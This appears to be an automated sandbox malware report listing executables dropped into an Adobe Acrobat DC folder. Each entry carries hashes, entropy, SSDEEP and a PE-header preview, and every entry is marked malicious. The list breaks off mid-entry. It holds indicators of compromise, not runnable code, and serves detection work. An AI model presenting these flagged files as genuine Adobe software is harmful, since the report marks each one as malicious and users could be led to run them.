                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999367273463827
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:HQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:wXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4BFB47B1A2D11D91E1D843EBEED07C7C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:41ED58B144D8F5C4342CD885E7C9B35ED1BEC94A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:44B9B09E791BB43C0FF440241CBFA1B591207D83DC65B1C73BB98C248DAD0526
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FCC62285F41E8F8B14748A6D2364D9492F34F1C7B5899D50814F7F7A1D8139CEC22A19535B530A59084CC14192FC2D24DF9487B4906E1EB2D45D10A78412F277
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1180160
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084775360232241
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:dWlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:d4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D277FD81068E6CF80FBED79FD000985D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8506232E369C0E50E2B8016C32628444EDDFF37E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:19DB9125A30614248B26A2D3CE26702EB65C39118A8E003991F3F9906633820B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7C33AAD71C197392BBB587BABC241F85C9735DA3EC9CFB41A0499A33BE924850A8222E593625A46D5B50F04D22DB89BFD5C59B0B1F0326AB50D8D37C1DFCA6FB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......ru.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.386703268788572
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:zDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXH:8nN9KfxLk6GEQTX5UKzNDmD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:978BB53090E352ECA174700D08FDD963
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6056B5D3D3EA1C5D6CB684EF63E7C4DDB03AAB87
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:22079AF53F78D26E91928B8CA3BD8DEDB0B12C1A4B6D813B8385D58EE7A1F65D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FD1325528F77A6CAA3E653D2096042BFCEBEF7BF3A143266FF5DC1BF8E6ED614A894C29C9B5933A9B04C9E519E885F2858EB9615937B59C4A5BE73091295BB02
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.04145079275527
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:kAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:74CF8991756415ACB834B21C5CF86B05
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7D7E178E913CD23E04E31688B09AFB547951DCE3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:668FE64B600F9F396D21FB722F38723C3C6F5A3225FEE209FEB375FE4BF20115
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD23768B465B5599ED6229AAB307A1A7AF8847326F9883596FBEBDD019E7C068FA431906593EC1C904ED17357B4398F43AECCDA8581805116EB32F017D779BCD
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................*..... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.596676134782541
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:3b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKHD527BWG:LnPgTHIwZoRBk9DdhSUEVIXgKHVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A562279CE3EBDB0658FF5BCB5E1D1D5E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8ADC928DA33E4DCB20AA9FCDBC39664F3C844B1E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D3D18088C566719AC079F3D229F9A3FA58915113BE3A55DBBE7762F6EA700B2E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:141393E32D472026A3AD0BDECB63EE9E929CF63815050A84C299368F8EB7AEAA64A66D3064AFF34D6431E6DD8CA98CF1D39AA4033549FA81CFD6F6722DD596E0
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................6.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.281787121299697
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:vg5FvCPusTsqjnhMgeiCl7G0nehbGZpbD:YftgDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FE72B8633EC163F94D1EF1A97FE85099
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0BA4B659DCB4087A46C90BD6924788F6B44523F0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CDFA80D8E8C015CD08D19CAEFB4E6E483841BF88FAFDC17355536E87B4AF1F96
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:07F656ADC02E40D1FE627B90F676AE8D2C649DF92A1A967CDCACBC8A01AE0B701AC4E9E0F8E473BF20A4084388C94F16B33CE50A78D0427B3BA2DE81A025751C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.208876219388968
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:zjKTIsAjFuvtIfmFthMaT5U8aChaeuxsqjnhMgeiCl7G0nehbGZpbD:zjIMmPh7TT79IDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:21F2A45DCAB67848FD0E08894ADF1843
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7107284E8CBCDCD2E66607AC629E719A35C41AE2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96C79D89E2DABF21A272881E2370FB7D644019281AC254791677E8F8F16307C3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A78D076011061DAF746E86383E8B4C17A1363673CFF8890AAD271A0AF5BC2E3DD74F5A1270805F24B0A108CA6699A666C88A70B12BCA05201F5266D6B6BFD329
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4117586266062885
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:1GqVwCto1Gm5WgVsqjnhMgeiCl7G0nehbGZpbD:EZ1GmUWDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3E9D2B935F1E380DAA0DB053423EDFBC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4B280171000713F148B48DEBCF1E23DE50F9B472
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:10E38226ED04DD66941E2DF5635DEAD145FDC2C94970B28B5BEFF0A4C4D45DCB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:61FC513D7E8BB46CA7B92FE0A6C3FE05863CE129B61CDC99F3793C27DD5A5F3A626E3934B8CB6E33F307973D6A305595389F8360B6139622456C7A30A765719D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.....................................U.... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.157363194888388
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:JWBWRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JWBWRsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6954F1FFBBE6BBA00ED78F267B48FF4D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E069AE712E1402001247A28DE738ACF173AC8622
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8CD1008041256D6C2B7F4FC45A11DA2A335A2F82ECFEA3919562A37AE27F35F3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:68469ED272975FBDFCE1432FF2CC9FBA0B4752DDBD0B9F250BF4E90F7DC08A8273D7F24C6FF255DB0A99240D8557EC9738A9DA2FDFE1279EF93A972C092523B2
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.228478049719188
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:sf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0usqjnhMgeiCl7G0nehbGZpbD:s+GtCi27mVTyT+a0CDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DFBEB89329EFEE35AB4DA6A8A7C31671
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D25E1BE8E011F3EB56F9297F126F1B06A5C3428F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2E905792A5F54E57AA0DFF91276B5132021955A65C4759561DCA7C5EB532BDDF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9BFFC6F0D88CA64E9FF7511BF9237C64248B78D499C8B4BC2F04D5FE67C03D323FF68040BFD8749592EBFF137CAFDD38F482039FB0F770C1453F0EE1F1A7AC6D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.....................................1.... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.649652941913111
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:SU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYRDmg27RnWGj:32NfHOIK5Ns6qR9bD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:625617501F5862E35A4F67C434A07E1B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2C7BC1D6DE7EACD582D39702271E3D514575A721
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6E3737A55D250FC5D8C9797B3DE1ABF3127FA08F35F5FE08AA40EBF5977F5F42
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:25F9A9A8DDBFA3FFE1184E80E330D9D88E151FC32EFB42A185F1AAB67A993320EFBC162254556FBB2D2B33C06E5D934986AF92326C5C80E7826A9E3DD0EC7659
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......y/... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.531893521235026
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:okcWTUQcydFsqjnhMgeiCl7G0nehbGZpbD:ohKUaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A846B9E7A16397001B975A1D9F1A169C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7B7816D6E96712EAD16CAB6BAFBD19A33A496110
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7EEA97E122F4888F8B689D67EF7E68C5569CB84B1EC80FF6B194D9565724EA9E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:26F3EC4A7C64B723C3C4B6BBC8DF8C3A360ADA3210FC0FD9FD4DB3ADBDE3124C8E8D206C331F606E781CA94B10905863C0C0924FC6392F0135915C4060D55E9B
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.....................................'.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.35264033671001
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:GfY+FUB+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GA+qB+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:92FF3FF448F7A0429F84297452145E47
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A504291EE806A72ADF7B84B08EBDCBDCDC264238
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D8282D30B88B56AA5A22C9B8B211364A4F39376ABA8A0CC2863A7F6B3CBF3C0E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DBC7A6272C51627220938A58FCC7BCE50E526CB79D8C0F041A2578C985A6604374DD703D4E4EACE50F1BE9E1C2D2BA7BC99DAA4467172C593DA36719D0531B6
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................u...............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
